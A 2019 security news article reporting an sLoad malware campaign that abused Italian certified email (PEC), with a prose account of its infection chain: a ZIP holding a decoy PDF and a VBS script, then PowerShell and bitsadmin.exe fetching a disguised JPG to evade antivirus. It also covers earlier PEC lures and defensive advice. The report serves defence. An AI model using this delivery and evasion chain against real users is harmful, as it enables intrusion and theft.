Light Dark
October 7, 2019 By David Bisson 2 min read

Attackers are leveraging certified emails to target Italian users with samples of the sLoad malware family.

According to Cybaze-Yoroi ZLAB, the sLoad campaign began when criminals used certified emails to target Italian organizations and consultants affiliated with professional associations. Known as posta elettronica certificata (PEC) in Italy, certified emails are essentially normal email messages that come with an added guarantee of the sender’s identity. This verification lulled recipients into a false sense of security and tricked them into opening the attached .ZIP file.

Once opened, unlike previous attack campaigns, the .ZIP archive didn’t hide PowerShell code. Instead, it contained a corrupted PDF document and a VBS script. The first item attempted to trick the recipient that all was well so that they would run the script. If they complied, the script launched a PowerShell script retrieved from the attackers’ infrastructure that downloaded a malicious .JPG using bitsadmin.exe. This technique helped the campaign evade detection from AV tools while the image file loaded another PowerShell script that established persistence on the infected machine and used a series of other commands to download the final payload.

A Wave of Attacks Exploiting Posta Elettronica Certificata (PEC)

The sLoad operation isn’t the first attack campaign to involve certified email in some way. In January 2017, My Online Security detected a malspam campaign that used “posta certifica” in the subject line and body of its attack emails. Approximately two years later, researchers at ESET observed DanaBot combing through victims’ inboxes for emails specifically containing the substring “pec,” presumably in an effort to target corporate and public administration emails. Then, in April 2019, Cisco Talos discovered attackers pairing PEC with the JasperLoader downloader to target Italians with the Gootkit banking Trojan.

Help Defend Against sLoad Malware

Security professionals can help their organizations defend against sLoad by moving systems away from a model of escalated privilege access and toward one of least privilege through access management, multifactor authentication (MFA) and other security controls. Employee security awareness training, along with sophisticated security information and event management (SIEM) tools, can help organizations detect and defend against PowerShell attacks.

 |  |  |  |  |  |  |  |  | 
David Bisson
Contributing Editor

More from

December 23, 2024

FYSA – Adobe Cold Fusion Path Traversal Vulnerability

2 min read - Summary Adobe has released a security bulletin (APSB24-107) addressing an arbitrary file system read vulnerability in ColdFusion, a web application server. The vulnerability, identified as CVE-2024-53961, can be exploited to read arbitrary files on the system, potentially leading to unauthorized access and data exposure. Threat Topography Threat Type: Arbitrary File System Read Industries Impacted: Technology, Software, and Web Development Geolocation: Global Environment Impact: Web servers running ColdFusion 2021 and 2023 are vulnerable Overview X-Force Incident Command is monitoring the disclosure…

November 22, 2024

What does resilience in the cyber world look like in 2025 and beyond?

6 min read -  Back in 2021, we ran a series called “A Journey in Organizational Resilience.” These issues of this series remain applicable today and, in many cases, are more important than ever, given the rapid changes of the last few years. But the term "resilience" can be difficult to define, and when we define it, we may limit its scope, missing the big picture.In the age of generative artificial intelligence (gen AI), the prevalence of breach data from infostealers and the near-constant…

November 21, 2024

Airplane cybersecurity: Past, present, future

4 min read - With most aviation processes now digitized, airlines and the aviation industry as a whole must prioritize cybersecurity. If a cyber criminal launches an attack that affects a system involved in aviation — either an airline’s system or a third-party vendor — the entire process, from safety to passenger comfort, may be impacted.To improve security in the aviation industry, the FAA recently proposed new rules to tighten cybersecurity on airplanes. These rules would “protect the equipment, systems and networks of transport…

Topic updates

 Get email updates and stay ahead of the latest threats to the security landscape, thought leadership and research.
Subscribe today
© 2025 IBM Contact Privacy Terms of use Accessibility Cookie Preferences
Sponsored by si-icon-eightbarfeature